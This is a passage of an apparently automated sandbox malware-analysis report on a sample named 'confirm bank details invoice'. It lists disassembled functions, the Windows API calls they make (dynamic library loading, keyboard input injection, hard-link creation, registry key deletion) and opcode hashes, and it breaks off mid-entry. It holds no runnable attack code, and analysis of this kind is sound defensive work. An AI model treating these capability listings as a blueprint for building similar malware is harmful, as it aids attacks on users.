                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: bbfad8aa261702e94026511695e7dff532d27bb5fbd839c39904aab231b07e11
                    • Instruction ID: 355c209229be5de0a5de1c29a033361f89acdc910b5951b738a349c574cf69ce
                    • Opcode Fuzzy Hash: bbfad8aa261702e94026511695e7dff532d27bb5fbd839c39904aab231b07e11
                    • Instruction Fuzzy Hash: 75D0A730900B22AFC7204F20F80C6627AD8BF05301F00843AE949D22A4D7B4C880CA14
                    Function 0047434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,004741BB,00474341,?,0047422F,?,004741BB,?,?,?,?,004739FE,?,00000001), ref: 00474359
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0047436B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: 8009f866b089fe4a7b3d2fc9c1d2b24e2d62db00e79898dc44b28c6f4fdf02e4
                    • Instruction ID: 43a9197d3f931c058b0199cbd85fa3ad38930f1ca12abf6fb93fa295c0d45665
                    • Opcode Fuzzy Hash: 8009f866b089fe4a7b3d2fc9c1d2b24e2d62db00e79898dc44b28c6f4fdf02e4
                    • Instruction Fuzzy Hash: 60D0A730940722AFD7214F30F8486627ADCBF11715F00853AE889D2290D7B4D880CA14
                    Function 004B0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,004B052F,?,004B06D7), ref: 004B0572
                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 004B0584
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                    • API String ID: 2574300362-1587604923
                    • Opcode ID: d1d1c49c4518dbc9fc7bff599e55342ec87130ebf5914c60eb175f4123107376
                    • Instruction ID: 7303beabd10e01d079d656541ac716a3ecdf5c5a030267badf3a9bf97bebb413
                    • Opcode Fuzzy Hash: d1d1c49c4518dbc9fc7bff599e55342ec87130ebf5914c60eb175f4123107376
                    • Instruction Fuzzy Hash: 4CD05E74800322AAD7309F20A909A537BE4BF05301F10882AE841D2694D674C480CA34
                    Function 004B0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,004B051D,?,004B05FE), ref: 004B0547
                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 004B0559
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                    • API String ID: 2574300362-1071820185
                    • Opcode ID: d4afc18452ad52f89dbc323864d4ab351382216a7ba359687c165ad5e72c0242
                    • Instruction ID: 7f6d01046181909fc6ba2f819973a3e11fc963cb62bea207462474b8b2fcd908
                    • Opcode Fuzzy Hash: d4afc18452ad52f89dbc323864d4ab351382216a7ba359687c165ad5e72c0242
                    • Instruction Fuzzy Hash: A5D0A734800722BFC730CF20F9096537AE4BF05302F10C43EE446D2694E674C880CA24
                    Function 004CECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,004CECBE,?,004CEBBB), ref: 004CECD6
                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 004CECE8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                    • API String ID: 2574300362-1816364905
                    • Opcode ID: a3f1258934fa6f64a2cac4e17f3296a11519cf70a6a88b8486cee691f8a5aaf0
                    • Instruction ID: 9211af953f0f0e9175f804ff38eec62349df2b731c3b31c88df771dab969521a
                    • Opcode Fuzzy Hash: a3f1258934fa6f64a2cac4e17f3296a11519cf70a6a88b8486cee691f8a5aaf0
                    • Instruction Fuzzy Hash: 89D0A735800733AFCB205F61F948B177AE8BF01300F00843EF846D2290DB74C880DA54
                    Function 004CBADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,004CBAD3,00000001,004CB6EE,?,0050DC00), ref: 004CBAEB
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 004CBAFD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    • Opcode ID: 71451e9f0dcf4bd6772752eb5b7744d4a622d3aa05cb4ce575ac5321966aec93
                    • Instruction ID: 561a7d4f063b204603c21ee474fcb992b9f3aeef5c1a0fba6862ac8bb697c288
                    • Opcode Fuzzy Hash: 71451e9f0dcf4bd6772752eb5b7744d4a622d3aa05cb4ce575ac5321966aec93
                    • Instruction Fuzzy Hash: ABD05E74C00B239EC7309F20B849F227AD8BF01300F00442EA84392694E774D880CA58
                    Function 004D3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,004D3BD1,?,004D3E06), ref: 004D3BE9
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004D3BFB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    • Opcode ID: 6ced73b16ddf44628bfafef04586f12310175b5ed5b8e2cfd5a1d052c5f9a3f6
                    • Instruction ID: 59997a66e1a97b543e7c9c8a994c4a7402285c4998c18d95ba68d824dd958fad
                    • Opcode Fuzzy Hash: 6ced73b16ddf44628bfafef04586f12310175b5ed5b8e2cfd5a1d052c5f9a3f6
                    • Instruction Fuzzy Hash: B4D0A771910722DFC7205F60F908617BEF5BF02715B10443BE445E2390D6B4D480CE15
                    Function 004A9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: acef7c53798e28da6e66394525c290c31fd72af7b280d5eef9c911689456919b
                    • Instruction ID: 6d12f9723cf2da0705ad0ffaa06fa19bd71cbecfa405157914844f96b9da91b2
                    • Opcode Fuzzy Hash: acef7c53798e28da6e66394525c290c31fd72af7b280d5eef9c911689456919b
                    • Instruction Fuzzy Hash: F1C17D75A0021AEFCB14CF94C884AAEB7B5FF59710F10859AE901EF291D734EE81DB94
                    Function 004CAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 004CAAB4
                    • CoUninitialize.OLE32 ref: 004CAABF
                      • Part of subcall function 004B0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004B027B
                    • VariantInit.OLEAUT32(?), ref: 004CAACA
                    • VariantClear.OLEAUT32(?), ref: 004CAD9D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                    • String ID:
                    • API String ID: 780911581-0
                    • Opcode ID: 13388016763fe641d0a48865f79a987efd2417458b2c7c413f24feb4cf528e17
                    • Instruction ID: d7dfeb771d6e5c8d8722df8d8277463f8dbc10d0ff4d81cb64b81a701d61c841
                    • Opcode Fuzzy Hash: 13388016763fe641d0a48865f79a987efd2417458b2c7c413f24feb4cf528e17
                    • Instruction Fuzzy Hash: F9A148396047059FC750EF15C481B5AB7E5BF48718F04844EFA9A9B3A2CB38ED15CB8A
                    Function 004A91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    • Opcode ID: 5c9c13140101b9a90e9247efb8172739215b07a5f9d94ec766d6dd5772d8df17
                    • Instruction ID: 3f15e56a3455fe9835b2867b0c52a5934b5aed92034d4a6ac97761a933c4b1ce
                    • Opcode Fuzzy Hash: 5c9c13140101b9a90e9247efb8172739215b07a5f9d94ec766d6dd5772d8df17
                    • Instruction Fuzzy Hash: 23518230A04306ABDF24AF67949166EB3F5EF6A314F20881FE946CB2D1DB789C41871D
                    Function 0049365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                    • String ID:
                    • API String ID: 3877424927-0
                    • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                    • Instruction ID: 8f15d075358429dd27e9fc29b6bd66edbf5a0a18595af90d30c35f54afd690eb
                    • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                    • Instruction Fuzzy Hash: A351C6B0A00205ABDF349FA9888456F7FA1AF42325F24877FF825863D0D7789F518B59
                    Function 004DC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(01127790,?), ref: 004DC544
                    • ScreenToClient.USER32(?,00000002), ref: 004DC574
                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 004DC5DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    • Opcode ID: 57692c9d820a013c472940b4133c16989b3c0fd6f9a5c0938f9ccdc7f3690d50
                    • Instruction ID: c168503594f982c471f4faf314667fa95e0642b1a6891cf63be0c16f2b7d4d9b
                    • Opcode Fuzzy Hash: 57692c9d820a013c472940b4133c16989b3c0fd6f9a5c0938f9ccdc7f3690d50
                    • Instruction Fuzzy Hash: 7D515C75900206AFCF10DF68D8E1AAE7BB6EB55320F20865BF8159B390D734ED41CB94
                    Function 004AC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 004AC462
                    • __itow.LIBCMT ref: 004AC49C
                      • Part of subcall function 004AC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 004AC753
                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 004AC505
                    • __itow.LIBCMT ref: 004AC55A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$__itow
                    • String ID:
                    • API String ID: 3379773720-0
                    • Opcode ID: 2d4ca2189f5f519d07ced10b79ff760418d8c823f1ef94a21ff028a06271766a
                    • Instruction ID: 39db691101676c9b049741d689f91502b7e6740f6c813a85c771c9647c9abfcc
                    • Opcode Fuzzy Hash: 2d4ca2189f5f519d07ced10b79ff760418d8c823f1ef94a21ff028a06271766a
                    • Instruction Fuzzy Hash: 35410730A00218BFDF15EF55C881BEE7BB9AF5A704F00401EF509A7281DB78AA45CB99
                    Function 004B390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 004B3966
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 004B3982
                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004B39EF
                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 004B3A4D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 2a3d331c0ea0360fb24861ad904b0382e9ff9256352b2448829d7a5f4aab1905
                    • Instruction ID: 6b84cd16d5e23ef6e872fec3b32f1830991b970392e45dd414ecc51191b9f3b6
                    • Opcode Fuzzy Hash: 2a3d331c0ea0360fb24861ad904b0382e9ff9256352b2448829d7a5f4aab1905
                    • Instruction Fuzzy Hash: D441E6B0E44248AAEF208F6688057FEBBB99B59316F04015BF4C1922C1C7BC9E95D77D
                    Function 004BE698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004BE742
                    • GetLastError.KERNEL32(?,00000000), ref: 004BE768
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004BE78D
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004BE7B9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    • Opcode ID: a508c75e5708c15d91fe2e521fd7d6c7b3fc43a9b0bb5058b07d90935f578d2c
                    • Instruction ID: 9d806443898023160532720cd65ceefa730f4349e958b08668d9f445eaa030bd
                    • Opcode Fuzzy Hash: a508c75e5708c15d91fe2e521fd7d6c7b3fc43a9b0bb5058b07d90935f578d2c
                    • Instruction Fuzzy Hash: 7F414A39600610DFCB11EF16C54499DBBE5BF89714B19C49AED0A9B362CB78FC00DB99
                    Function 004DB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004DB5D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: ed973dbe297c62adb7b3d8751e940cf9bc7158e45db49e5b43df8d90bece298c
                    • Instruction ID: 91d32655d43bd82d4a70e737a17c019250ecfcc9c4917c574b2c6fb68cbca452
                    • Opcode Fuzzy Hash: ed973dbe297c62adb7b3d8751e940cf9bc7158e45db49e5b43df8d90bece298c
                    • Instruction Fuzzy Hash: E331CE34600104FBEB208A199CB9FAE37A5EB05354F564113FA11D63E1C738E9519B9E
                    Function 004DD7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                    Download Yara Rule
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 004DD807
                    • GetWindowRect.USER32(?,?), ref: 004DD87D
                    • PtInRect.USER32(?,?,004DED5A), ref: 004DD88D
                    • MessageBeep.USER32(00000000), ref: 004DD8FE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    • Opcode ID: d67be8ac56db5bd1a46e2d7add015fb414089a3f251a4502cc04af099d3931e5
                    • Instruction ID: c42ff1c8ac29c7fdf9edc6a13f870205adccf24df640dcffc62caf8801785f68
                    • Opcode Fuzzy Hash: d67be8ac56db5bd1a46e2d7add015fb414089a3f251a4502cc04af099d3931e5
                    • Instruction Fuzzy Hash: 00418B70E00218DFCB12EFA9C8A5A697BB5BB45310F1881ABF4258B354D734E949EB48
                    Function 004B3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 004B3AB8
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 004B3AD4
                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 004B3B34
                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 004B3B92
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
